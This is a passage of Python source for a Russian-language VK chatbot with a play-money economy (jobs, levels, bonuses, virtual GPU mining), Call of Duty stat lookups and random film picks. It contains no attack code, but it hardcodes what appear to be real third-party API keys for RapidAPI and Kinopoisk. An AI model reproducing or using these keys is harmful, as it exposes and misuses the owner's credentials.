"message": "💎 | Вы получили перевод от " + "@id" + str(id) + " (" + user[0]['first_name'] + ") в размере: " + val + "$",
"random_id": random.randint(1, 2147483647)})
return "Перевод успешно выполнен! \nВаш баланс: " + str(per["balance"]) + "$"
else:
return "Сумма превышает ваш баланс или Сумма меньше 0\n" + bal(id)
def ulist():
c=1
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = '[' + str(c) + '] ' + "vk.com/id" + str(f[i][:-5])
c += 1
return "Количество пользователей [" + str(c) + "]"
def getanekdot():
z = ''
s = requests.get('http://anekdotme.ru/random')
b = bs4.BeautifulSoup(s.text, "html.parser")
p = b.select('.anekdot_text')
for x in p:
s = (x.getText().strip())
z = z + s + '\n\n'
return s
def stats2(nick, idd):
url = "https://call-of-duty-modern-warfare.p.rapidapi.com/multiplayer/" + nick + "%23" + idd + "/battle"
headers = {
'x-rapidapi-key': "3d7ffcf6eemsheb0b038baa4b97ep118126jsnd220b4b88e25",
'x-rapidapi-host': "call-of-duty-modern-warfare.p.rapidapi.com",
}
time.sleep(1)
response = requests.request("GET", url, headers=headers)
r = str(response.text).split(",")
p=["level", "levelXpRemainder", "levelXpGained", "prestige"]
a=[]
b=[]
c=0
for i in range (len(r)):
for j in range(len(p)):
if p[j] in r[i+c] and p[j] not in a:
a.append(i)
++c
break
a = a[0:(len(p))]
a = list(map(int, a))
for i in range (len(a)):
b.append(r[a[i]])
if len(r) > 3:
#level
lvl = "\n🏷Уровень: " + b[0][8:]
#prestige
pr = "\n🔰Престиж: " + b[3][11:]
#lvlxp
lvlxp = "\n📋Прогресс уровня: " + b[1][19:] + "/" + b[2][16:] + "\n"
stat2 = lvl + pr + lvlxp
return stat2
else:
return 0
def stats(nick, idd):
url = "https://call-of-duty-modern-warfare.p.rapidapi.com/warzone/" + nick + "%23" + idd + "/battle"
headers = {
'x-rapidapi-key': "3d7ffcf6eemsheb0b038baa4b97ep118126jsnd220b4b88e25",
'x-rapidapi-host': "call-of-duty-modern-warfare.p.rapidapi.com",
}
response = requests.request("GET", url, headers=headers)
r = str(response.text).split(",")
if len(r) > 3:
# WINS
wins = "\n🎉Побед: " + r[0][14:999]
# KILLS
kills = "\n🥴Убийств: " + r[1][8:999]
# KD
kd = "\n📈К/Д: " + r[2][10:14]
# DEATHS
deaths = "\n☠Смертей: " + r[15][9:999]
# top25
top25 = "\n2️⃣5️⃣Топ-25: " + r[4][16:999]
# top10
top10 = "\n1️⃣0️⃣Топ-10: " + r[5][9:999]
# contracts
contracts = "\n🎟Контракты: " + r[6][12:999]
# revives
revives = "\n➕Поднятий: " + r[7][10:999]
# DOWNS
downs = "\n🔻Нокдауны: " + r[3][8:999]
# top5
top5 = "\n5️⃣Топ-5: " + r[8][10:999]
# matches
matches = "\n\n⌨Всего игр: " + r[11][14:999]
# score
score = "\n💡Всего EXP: " + r[9][8:999]
# scorePM
spm = r[13][17:999]
sppm = round(float(spm))
scorePM = "\n🎛EXP в минуту: " + str(sppm)
# timeplayed
ttt = (datetime.timedelta(seconds=int(r[10][13:999])))
totaltime = "\n💻Всего отыграно времени: " + str(ttt)
# avgkills
avgk = int(r[1][8:999]) / int(r[11][14:999])
avgkills = "\n😵Ср.Убийств: " + str(round(avgk, 2))
stat = "📊Статистика " + nick + "#" + idd + matches + "\n" + kills + avgkills + "\n" + downs + revives + "\n" + deaths + "\n" + kd + "\n" + wins + "\n" + score + scorePM + contracts + "\n" + stats2(nick, idd) + top5 + top10 + top25 + "\n" + totaltime + "\n\nby @gamtz" + ver
vk.method("messages.send", {"peer_id": id, "message": stat, "random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Ошибка! Проверьте ник и id⚠\nТакже проверьте настройки "
"приватности.\nПодробности в статье: vk.com/@cod_stats-help",
"random_id": random.randint(1, 2147483647)})
def stats20(nick, idd):
a = []
p = ["kills", "headshots", "killsPerGame", "headshotPercentage", "objectiveTeamWiped", "assists", "deaths",
"kdRatio", "score", "scorePerMinute", "gulagKills", "gulagDeaths", "damageDone", "damageTaken",
"distanceTraveled", "avgLifeTime", "timePlayed"]
url = "https://call-of-duty-modern-warfare.p.rapidapi.com/warzone-matches/" + nick + "%23" + idd + "/battle"
headers = {
'x-rapidapi-key': "3d7ffcf6eemsheb0b038baa4b97ep118126jsnd220b4b88e25",
'x-rapidapi-host': "call-of-duty-modern-warfare.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers)
r = str(response.text).split(",")
c = 0
for i in range(len(r)):
for j in range(len(p)):
if p[j] in r[i + c] and p[j] not in a:
a.append(i)
var = ++c
break
a = a[0:(len(p))]
a = list(map(int, a))
if len(r) > 3:
# kills
kills = "\n\n🥴Убийств: " + r[a[0]][27:999]
# fsquad
fsquad = "\n👥Сквадов уничтожено: " + r[a[1]][21:999]
# avglife
if round(float(r[a[2]][14:999])) > 0:
avgl = round(float(r[a[2]][14:999]))
avglife = "\n⌛Среднее время жизни: " + str((datetime.timedelta(seconds=int(avgl))))
else:
avglife = "\n⌛Среднее время жизни: " + "⚠Cыграйте больше игр⚠"
# score
score = "\n💡Всего exp: " + r[a[3]][8:999]
# hs
hs = "\n💀Убийства в голову: " + r[a[4]][12:999]
# assists
assists = "\n♻Помощи: " + r[a[5]][10:999]
# avgkills
avgkills = "\n😵Ср.убийств: " + r[a[6]][15:999]
# scorepm
if round(float(r[a[7]][17:999])) > 0:
scorepm = "\n🎛Exp в минуту: " + str(round(float(r[a[7]][17:999])))
else:
scorepm = "\n🎛Exp в минуту: " + "⚠Cыграйте больше игр⚠"
# distance
distance = "\n🗺Пройденная дистанция: " + str(round(float(r[a[8]][19:999]) / 100000))
# deaths
deaths = "\n☠Смертей: " + r[a[9]][9:999]
# kd
kd = "\n📈К/Д: " + str(round(float(r[a[10]][10:999]), 2))
# gulagdeaths
gdeaths = "\n🕳Смертей в гулаге: " + r[a[11]][14:999]
# totaltime
if round(float(r[a[12]][13:999])) > 0:
tt = round(float(r[a[12]][13:999]))
totaltime = "\n💻Всего отыграно времени: " + str((datetime.timedelta(seconds=int(tt))))
else:
totaltime = "\n💻Всего отыграно времени: " + "⚠Cыграйте больше игр⚠"
# hsper
hsper = "\n🧠Процент убийств в голову: " + str(round(float(r[a[13]][21:999]), 2))
# gulagkills
gkills = "\n👮Убийств в гулаге: " + r[a[14]][13:999]
# damagegive
gdamage = "\n🔫Нанесено урона: " + r[a[15]][13:999]
# damagetaken
td = r[a[16]].split("}")
tdamage = "\n🥊Получено урона: " + td[0][14:999]
# gulagkd
gkd = "\n📊Гулаг К/Д: " + str(round(float(int(gkills[20:999]) / int(gdeaths[20:999])), 2))
stat20 = "📊статистика " + nick + "#" + idd + " за последние 20 матчей" + kills + hs + avgkills + hsper + fsquad + "\n" + assists + "\n" + deaths + "\n" + kd + "\n" + score + scorepm + "\n" + gkills + gdeaths + gkd + "\n" + gdamage + tdamage + "\n" + distance + avglife + totaltime + "\n\nby @gamtz" + ver
vk.method("messages.send", {"peer_id": id, "message": stat20, "random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Ошибка! Проверьте ник и id⚠\nТакже проверьте настройки приватности.\nПодробности в статье: vk.com/@cod_stats-help",
"random_id": random.randint(1, 2147483647)})
def uplf(iddd, purl):
global d
p = requests.get(purl[1])
out = open("films/" + iddd + ".jpg", "wb")
out.write(p.content)
out.close()
a = vk.method("photos.getMessagesUploadServer")
b = requests.post(a['upload_url'], files={'photo': open('films/' + iddd + '.jpg', 'rb')}).json()
c = vk.method('photos.saveMessagesPhoto', {'photo': b['photo'], 'server': b['server'], 'hash': b['hash']})[0]
d = "photo{}_{}".format(c["owner_id"], c["id"])
def rfilm():
global iddd
iddd = str(random.randrange(1, 99999))
url = 'https://kinopoiskapiunofficial.tech/api/v2.1/films/' + iddd
headers = {
'X-API-KEY': '79e32931-ef2c-4921-9e01-dac1d164971b',
}
response = requests.get(url, headers=headers)
r = str(response.text).split(",")
p=["nameRu", "webUrl", "posterUrl", "posterUrlPreview", "year"]
a=[]
b=[]
c=0
for i in range(len(r)):
for j in range(len(p)):
if p[j] in r[i+c] and p[j] not in a:
a.append(i)
++c
break
a = a[0:(len(p))]
a = list(map(int, a))
for i in range(len(a)):
b.append(r[a[i]])
#
name = 'Название: ' + b[0][9:]
#
kkurl = (b[1][9:]).split('"')
kurl = 'Ссылка на Кинопоиск: ' + kkurl[1]
#
purl = (b[2][12:]).split('"')
#
year = 'Год выпуска: ' + (b[4][7:])
res = name + "\n" + year + '\n' + kurl
uplf (iddd, purl)
return (res)
def lvlcheck(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["exp"] > 50 and ff["level"] == 1:
ff["level"] = 2
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
if ff["exp"] > 150 and ff["level"] == 2:
ff["level"] = 3
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
if ff["exp"] > 300 and ff["level"] == 3:
ff["level"] = 4
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
if ff["exp"] >= 500 and ff["level"] == 4:
ff["level"] = 5
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
def workinfo(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
return "\n👤 Информация:" \
"\n" \
"\n💼 Работа: " + str(ff["work"]) + \
"\n📶 Уровень: " + str(ff["level"]) + \
"\n💡 Опыт: " + str(ff["exp"])
def works(id):
s= "Список работ:" \
"\n\n" \
+ str(lvlchk2(id,1)) + " 1 уровень" \
"\n 1) 🚕 FakeTAXI - 100$ | 20 секунд | 2 опыта" \
"\n 2) 👨🌾 Ферма - 180$ | 40 секунд | 4 опыта" \
"\n\n" \
+ str(lvlchk2(id,2)) + " 2 уровень" \
"\n 3) 💻 Тестировщик игр - 420$ | 1 минута | 6 опыта" \
"\n 4) ☕ Работник кофейни - 600$ | 1:30 минуты | 9 опыта" \
"\n\n" \
+ str(lvlchk2(id,3)) + " 3 уровень" \
"\n 5) 🏭 Рабочий на заводе - 1 080$ | 2 минуты | 12 опыта" \
"\n 6) 🍷 Дегустатор вина - 1 600$ | 3 минуты | 18 опыта" \
"\n\n" \
+ str(lvlchk2(id,4)) + " 4 уровень" \
"\n 7) 💨 Продавец в Verdax - 3 600$ | 5 минут | 30 опыта" \
"\n 8) 🌸 Дизайнер - 7 000$ | 10 минут | 60 опыта" \
"\n\n" \
+ str(lvlchk2(id,5)) + " 5 уровень" \
"\n 9) 🍥 Режиссёр Аниме - 18 000$ | 20 минут" \
"\n 10) 👽 Директор Natflex - 36 000$ | 40 минут" \
"\n\n" \
"\nЧтобы устроиться на работу 'устроиться {номер}'"
return s
def work(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["wstatus"] == False:
if ff["work"] != "":
if ff["level"] >= 1:
if ff["work"] == "FakeTAXI":
work = 1
ff["wstatus"] = True
threading.Timer(20.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать в FakeTAXI! \nЗакончите через 20 секунд"
if ff["work"] == "Ферма":
ff["wstatus"] = True
work = 2
threading.Timer(40.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать на Ферме! \nЗакончите через 40 секунд"
if ff["level"] >= 2:
if ff["work"] == "Тестировщик игр":
ff["wstatus"] = True
work = 3
threading.Timer(60.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Тестировщиком игр! \nЗакончите через 1 минуту"
if ff["work"] == "Работник кофейни":
ff["wstatus"] = True
work = 4
threading.Timer(90.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать в кофейне! \nЗакончите через 1:30 минуты"
else:
return "У вас слишком маленький уровень! \nНеобходим: 2\nВаш уровень: " + str(ff["level"])
if ff["level"] >= 3:
if ff["work"] == "Рабочий на заводе":
ff["wstatus"] = True
work = 5
threading.Timer(120.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать на Заводе! \nЗакончите через 2 минуты"
if ff["work"] == "Дегустатор вина":
ff["wstatus"] = True
work = 6
threading.Timer(180.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Дегустатором вина! \nЗакончите через 3 минуты"
else:
return "У вас слишком маленький уровень! \nНеобходим: 3\nВаш уровень: " + str(ff["level"])
if ff["level"] >= 4:
if ff["work"] == "Продавец в Verdax":
ff["wstatus"] = True
work = 7
threading.Timer(300.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать продавцом в Verdax'e! \nЗакончите через 5 минут"
if ff["work"] == "Дизайнер":
ff["wstatus"] = True
work = 8
threading.Timer(600.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Дизайнером! \nЗакончите через 10 минут"
else:
return "У вас слишком маленький уровень! \nНеобходим: 4\nВаш уровень: " + str(ff["level"])
if ff["level"] >= 5:
if ff["work"] == "Режиссёр Аниме":
ff["wstatus"] = True
work = 9
threading.Timer(1200.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Режиссёром Аниме! \nЗакончите через 20 минут"
if ff["work"] == "Директор Natflex":
ff["wstatus"] = True
work = 10
threading.Timer(2400.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Директором Natflex'a! \nЗакончите через 40 минут"
else:
return "⚠ У вас слишком маленький уровень! \nНеобходим: 5\nВаш уровень: " + str(ff["level"])
else:
return "⚠ Вы не устроены на работу!\nСписок работ: 'работы'"
else:
return "⚠ Вы уже работаете!"
def workend(id,work):
work = str(work)
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if work == "1":
slr = 100
exp = 2
if work == "2":
slr = 180
exp = 4
if work == "3":
slr = 420
exp = 6
if work == "4":
slr = 600
exp = 9
if work == "5":
slr = 1080
exp = 12
if work == "6":
slr = 1600
exp = 18
if work == "7":
slr = 3600
exp = 30
if work == "8":
slr = 7000
exp = 60
if work == "9":
slr = 18000
exp = 0
if work == "10":
slr = 36000
exp = 0
ff["wstatus"] = False
ff["balance"] += slr
if ff["level"] < 5:
ff["exp"] += exp
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
lvlcheck(id)
if work == "9" or work == "10":
vk.method("messages.send", {"peer_id": id,
"message": "💎 Вы закончили работу!\nВам начислена зарплата в размере: \n" + str(
slr) + "$",
"keyboard": rework().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "💎 Вы закончили работу!\nВам начислена зарплата в размере: \n" + str(slr) + "$" + " и " + str(exp) + " опыта",
"keyboard": rework().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
def report(id, msg):
if len(msg) <= 100:
for i in admins:
vk.method("messages.send", {"peer_id": i,
"message": "⚠ Репорт | vk.com/gim196468884?sel=" + id + " | " + msg,
"random_id": random.randint(1, 2147483647)})
return "✅ Репорт отправлен!"
else:
return "⚠ Ваш репорт превышает 100 символов"
def cgbonus(id):
vk.method("messages.send", {"peer_id": id,
"message": "💎 Вам снова доступен бонус!\nИспользуйте 'бонус', чтобы получить его",
"keyboard": bonusmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
def gbonus(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
o = (int(time.time()) - (ff["lbonus"] + 300)) * -1
if (int(time.time())) - ff["lbonus"] >= 300:
ff["balance"] += 300
ff["lbonus"] = int(time.time())
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
threading.Timer(300.0, cgbonus, args=(id,)).start()
vk.method("messages.send", {"peer_id": id,
"sticker_id": 8484,
"random_id": random.randint(1, 2147483647)})
return "💎 Вы получили бонус в размере 300$!\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Бонус можно получать раз в 5 минут!\nВозвращайтесь через " + str(o) + " секунд"
def idsearch(id):
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = str(f[i][:-5])
id_ = id.split('/')[-1]
try:
id = str(vk.method('users.get', {'user_ids': id_})[0]['id'])
except:
return "Пример использования:\nид vk.com/gamtz"
if id in f:
try:
return "👤 ID пользователя: " + id + "\n👔 Персонал: " + ifstaff(int(id))
except:
return "Пример использования:\nид vk.com/gamtz"
else:
return "Такого пользователя не существует!"
def ids(id):
path = "json/"
f = os.listdir(path)
for i in range(len(f)):
f[i] = str(f[i][:-5])
if "@" in id:
id_ = id.split('@')[-1][:-1]
else:
id_ = id.split('/')[-1]
try:
id = str(vk.method('users.get', {'user_ids': id_})[0]['id'])
except:
return "USER GET ERROR"
if id in f:
try:
return id
except:
return "USER NOT EXIST"
def congrts(id):
vk.method("messages.send", {"peer_id": id,
"sticker_id": 11788,
"random_id": random.randint(1, 2147483647)})
# Bytecoin
#магазин
def farmstatus(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
return "Состояние вашей фермы:" \
"\n" \
"\n 📄 Видеокарты: " + farmcheck(id) + \
"\n 🔋 Добыча: " + str(ff["farm"] * ff["gpu_amount"]) + " ₿ / 5 мин" + \
"\n 💴 Добыто в биткоинах: " + str(round(ff["farmed"] * ff["gpu_amount"],5)) + " ₿" + \
"\n 💵 Добыто в долларах: " + str(int(ff["farmed"] * 10000 * ff["gpu_amount"])) + " $" + \
"\n" \
"\n📌 Для снятия используйте 'сбитки'" \
#магазин
def sellbtc(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["farmed"] != 0.0:
temp = str(round(ff["farmed"],5))
ff["farmed"] = 0.0
ff["btc"] += float(temp)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "💱 Вы успешно перевели " + temp + " на основной счет"\
"\n💴 Ваш баланс: " + str(ff["btc"]) + " ₿"
else:
return "У вас нет накопившихся ₿"
def btcfarm(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["farmed"] += ff["farm"] * ff["gpu_amount"]
ff["farm"] = round(ff["farm"] * ff["gpu_amount"],5)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
threading.Thread(target=btcfarmstart, args=(id,)).start()
return 0
def btcfarmstart(id):
threading.Timer(300.0, btcfarm, args=(id,)).start()
return 0
def btcfarmreload():
path = "json/"
f=list(os.listdir(path))
for i in range (len(f)):
f[i] = str(f[i][:-5])
for i in range (len(f)):
id = f[i]
btcfarmstart(id)
return 0
# Bytecoin
def bfarm(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["gpu_amount"] < 5:
if n == "1" or n == "7": p = 10000
elif n == "2" or n == "8": p = 50000
elif n == "3" or n == "9": p = 100000
elif n == "4" or n == "10": p = 300000
elif n == "5" or n == "11": p = 500000
elif n == "6" or n == "12": p = 1500000
if n == '1' and ff["balance"] >= p:
if ff["gpu"] == "GF 210" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF 210"
ff["gpu_amount"] += 1
ff["farm"] = 0.00025
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '2' and ff["balance"] >= p:
if ff["gpu"] == "GF GTX 750 Ti" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF GTX 750 Ti"
ff["gpu_amount"] += 1
ff["farm"] = 0.0005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '3' and ff["balance"] >= p:
if ff["gpu"] == "GF GTX 1050 Ti" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF GTX 1050 Ti"
ff["gpu_amount"] += 1
ff["farm"] = 0.001
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '4' and ff["balance"] >= p:
if ff["gpu"] == "GF GTX 1660S" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF GTX 1660S"
ff["gpu_amount"] += 1
ff["farm"] = 0.005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '5' and ff["balance"] >= p:
if ff["gpu"] == "GF RTX 2080S" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF RTX 2080S"
ff["gpu_amount"] += 1
ff["farm"] = 0.01
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '6' and ff["balance"] >= p:
if ff["gpu"] == "GF RTX 3090 Mining ver" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF RTX 3090 Mining ver"
ff["gpu_amount"] += 1
ff["farm"] = 0.05
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '7' and ff["balance"] >= p:
if ff["gpu"] == "R5 220" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "R5 220"
ff["gpu_amount"] += 1
ff["farm"] = 0.00025
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '8' and ff["balance"] >= p:
if ff["gpu"] == "R7 360" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "R7 360"
ff["gpu_amount"] += 1
ff["farm"] = 0.0005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '9' and ff["balance"] >= p:
if ff["gpu"] == "R9 380" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "R9 380"
ff["gpu_amount"] += 1
ff["farm"] = 0.001
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '10' and ff["balance"] >= p:
if ff["gpu"] == "RX 580" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "RX 580"
ff["gpu_amount"] += 1
ff["farm"] = 0.005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '11' and ff["balance"] >= p:
if ff["gpu"] == "RX5700" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "RX5700"
ff["gpu_amount"] += 1
ff["farm"] = 0.01
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '12' and ff["balance"] >= p:
if ff["gpu"] == "RX6900XT" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "RX6900XT"
ff["gpu_amount"] += 1
ff["farm"] = 0.05
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: ккарту 1"
else:
return "У вас максимальное кол-во видеокарт - 5"
def sfarm(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["gpu"] != "":
if ff["gpu"] == "GF 210":
ff["balance"] += 10000
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF GTX 750 Ti":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 50000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF GTX 1050 Ti":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 100000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 100.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF GTX 1660S":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 300000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF RTX 2080S":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF RTX 3090 Mining ver":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 1500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1.500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "R5 220":
ff["balance"] += 10000
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "R7 360":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 50000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "R9 380":
if ff["gpu_amount"] == 1:
